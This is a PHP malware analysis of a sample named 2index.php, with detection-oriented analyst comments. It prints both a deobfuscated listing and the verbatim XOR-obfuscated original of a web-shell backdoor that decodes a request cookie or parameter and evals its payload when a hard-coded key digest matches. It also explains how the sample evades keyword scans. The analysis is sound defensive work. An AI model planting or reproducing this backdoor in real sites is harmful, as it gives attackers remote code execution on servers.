PHP Malware Analysis


Filename: 2index.php

Tags

Encoding
  • base64_decode
Execution
  • eval

Deobfuscated code

<?php

// Analyst note: these three assignments are what is left of the loader once the
// deobfuscator has resolved it. None of them is used by the decoded body below.

// Right-hand operand of the string XOR that produces the callable name: in the
// original one-liner, 'M3<O-623F8R,;= ' ^ $VJcajj.
$VJcajj = '.AY.YSmU3V1XRRN';
// Result of that XOR, as resolved by the deobfuscator. The raw sample never contains
// the text "create_function", so a plain-text search for it misses the file on disk.
$KueWZPVl = "create_function";
// XOR key for the second long literal in the original. Per this listing, the XOR
// result is the source of the function body rendered below as the closure.
$IENHTli = 'X fgWX<7>= En=KD40+mE 6B7O.AR.oYK8JceVF3g+L: YQ =GCZ5k,A.Xdq83 nmTA;UHwj83KkLlhvyVmhfa5XNjzEurwd0F7O9qwTYiKsvnB=R0< GQ dG 2DLyhzK0gRpas8nUMLxjSzoF7 :TjV:>k=bFG6A-qIKngG<:RP<apGE apSk:FnI<6FA;ZC 2=mAyG8eJgav1Y9.mHd12<:<LphH+;,nZ+KYeUQS MTrhlZSRH.1Qirf-uzb=;iuY<ln=U1OxOAiCOR65HePCHmPL 0oG=DUyTAF -Q;:bJ2JOfWFn A5  P=6km >dqUq -7Tpp<mq.7:ITN hmpn:nzgnjcfJ niV76xdswnFYL: JZAfg9fR40Ji=-2oOAfY0LrZoEsT7;LQedm2Z4F2POhGbKM0PZT-LkXgpH+==R L6QZWQUAE,R101gh9 TcSMF1NQa2VV=JRdk-ZE0kaNm>0 ZqSH0jOLoT3IOD6N2xtAfSDFR8iU<J.T;94T0olENJpvaMWXJ1SVcaxnZDxzwUQ>8gu<Q=fpmNzqpuO tbPwSPfzWTrXKRDIhPkvYugCB,XycUUsBipF0H S0lQNY8H=Q18GJCDR64, +aius2S PPOxfVgiq-R4+.XQqoDTCP.a +H;X4UE2NnikH7 Idzevd,h V+XO47SN4UZpN1:x7=hcpjc jl,tykmegnkYhe';
// Decoded backdoor body. In the original sample this code is not a closure: it is a
// string handed to create_function('', ...), which the deobfuscator renders as below.
// Summary for triage: a request parameter is decoded, deserialized, checked against a
// hard-coded MD5 digest and, on a match, executed with eval().
// Indicators visible in this listing: the helper name xor_data__mut, the digest
// cf94416b34fb053a2b893477766f739a, and a response body of md5(md5(Host header)).
$wLZRBSe = function () {
    // Helper is declared only if it does not exist yet (function_exists guard).
    if (!function_exists('xor_data__mut')) {
        // Repeating-key XOR: each byte of $data is XOR-ed with the key byte at
        // position i modulo the key length.
        function xor_data__mut($data, $key)
        {
            $out = '';
            for ($i = 0; $i < strlen($data); $i++) {
                $out .= $data[$i] ^ $key[$i % strlen($key)];
            }
            return $out;
        }
    }
    $data = false;
    $data_key = false;
    // Every iteration overwrites both variables, so only the LAST cookie's name and
    // value survive the loop. No fixed parameter name is used, which means there is no
    // constant cookie name to match on in access logs or WAF rules.
    foreach ($_COOKIE as $key => $value) {
        $data_key = $key;
        $data = $value;
    }
    // Fallback when no usable cookie value was found: the last entry of $_REQUEST is
    // taken the same way.
    if (!$data) {
        foreach ($_REQUEST as $key => $value) {
            $data_key = $key;
            $data = $value;
        }
    }
    // Decode chain: base64 -> XOR with the parameter NAME as key -> unserialize().
    // The @ operator silences the diagnostics unserialize() raises on malformed input.
    // NOTE(review): unserialize() runs on request data before the key check below.
    $data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
    // Gate: the decoded array must contain 'key' whose MD5 equals the hard-coded digest
    // (loose == comparison) and must contain 'payload'.
    if ($data && array_key_exists('key', $data) && md5($data['key']) == 'cf94416b34fb053a2b893477766f739a' && array_key_exists('payload', $data)) {
        // Arbitrary PHP from the request is executed in the web server's context;
        // exit(0) then ends the script.
        eval($data['payload']);
        exit(0);
    }
    // Any request that fails the gate gets the double MD5 of the Host header as the
    // response body: a 32-character hex string. A PHP endpoint that answers with only
    // this value is a usable detection signal.
    // NOTE(review): presumably a liveness marker for the operator; not confirmable here.
    echo md5(md5($_SERVER["HTTP_HOST"]));
};
// The body runs unconditionally whenever this file is requested or included.
$wLZRBSe();


Original code

<?php
// Raw sample, statements kept verbatim on one line. The text contains neither
// "create_function" nor "eval"/"unserialize"/"base64_decode": the callable name and the
// whole function body are produced at runtime by XOR-ing pairs of string literals, so a
// keyword scan of the file on disk does not match.
//   1. 'M3<O-623F8R,;= ' ^ $VJcajj  -> "create_function" (per the deobfuscated listing)
//   2. second long literal ^ $IENHTli -> source of the backdoor body, passed to
//      create_function('', ...)
//   3. $wLZRBSe()                   -> runs that body on every request to this file
// create_function() was removed in PHP 8.0, so this form only executes on older runtimes.
// Hunting hint: a short PHP file made of a few long high-entropy string literals combined
// with the ^ operator, followed by a variable used as a function name.
$VJcajj='.AY.YSmU3V1XRRN'; $KueWZPVl='M3<O-623F8R,;= '^$VJcajj; $IENHTli='X fgWX<7>= En=KD40+mE 6B7O.AR.oYK8JceVF3g+L: YQ =GCZ5k,A.Xdq83 nmTA;UHwj83KkLlhvyVmhfa5XNjzEurwd0F7O9qwTYiKsvnB=R0< GQ dG 2DLyhzK0gRpas8nUMLxjSzoF7 :TjV:>k=bFG6A-qIKngG<:RP<apGE apSk:FnI<6FA;ZC 2=mAyG8eJgav1Y9.mHd12<:<LphH+;,nZ+KYeUQS MTrhlZSRH.1Qirf-uzb=;iuY<ln=U1OxOAiCOR65HePCHmPL 0oG=DUyTAF -Q;:bJ2JOfWFn A5  P=6km >dqUq -7Tpp<mq.7:ITN hmpn:nzgnjcfJ niV76xdswnFYL: JZAfg9fR40Ji=-2oOAfY0LrZoEsT7;LQedm2Z4F2POhGbKM0PZT-LkXgpH+==R L6QZWQUAE,R101gh9 TcSMF1NQa2VV=JRdk-ZE0kaNm>0 ZqSH0jOLoT3IOD6N2xtAfSDFR8iU<J.T;94T0olENJpvaMWXJ1SVcaxnZDxzwUQ>8gu<Q=fpmNzqpuO tbPwSPfzWTrXKRDIhPkvYugCB,XycUUsBipF0H S0lQNY8H=Q18GJCDR64, +aius2S PPOxfVgiq-R4+.XQqoDTCP.a +H;X4UE2NnikH7 Idzevd,h V+XO47SN4UZpN1:x7=hcpjc jl,tykmegnkYhe'; $wLZRBSe=$KueWZPVl('', '1FNF1-RTJTO+1X3-GDXEbXY0h+O53q04>LmJLv=9nM9TC-8OSg;5G4H Z9;.UFTFI0 O4dWNSV2BlLHVY-gaoEZ-:JGeRULn9OQ KYS=yTkCMNfTnCHR+4NLcDS0-PSZoYLyYkz1J:88XDnZGbSAN51rScKcBb,S8vU kKG4HH>5RIT, YH-zP0Og;YB33UrgOGIDzsNEo7mkRU8MOMuDWSPIYwzL,JOM11N2yXu72L>1Ibf<< -OR9IZBr65-vr,U8OLJV0HoEqaM5.>CPaE+IAI4-TQ0,X=uDte-ETj13F.S>.FjfJV YUEk7KagIXDYtUDLC5YPGgxHXH,5-HHET1h++2+97F+SNM=ROXYMWJ08 OEcz:ln0B6UD+6VHKOraB2U5IPfLW0VO-qXDID;X3WkEa:h6G:t>5Y-KeG0=ENX I-Z8 2y-.7s6PDP87TU K1,5Txe>V35R.7LOI;1QBMnIZQT;.8-ICfwe=Uak W:SXRgF2643A6>Y3q1CPG CGK.+3WZAi39>PzvEGXF7 MRS10JY<RW4DA-DnGLPR,FMVdFe2UN16Bmx3v+PiXBnBPutJoJZ4rZbOVfQ:R2I3:+ g-E8BL4bd43OXCAOFEUWV2T1yfXFvGIQVX=NX9=YK 571uFPJ1W7U1bogUcb-OI=LJLMnQbE5C7gYSffY1oXjni=ek-1+H+t><s<689G:GBpSo'^$IENHTli); $wLZRBSe();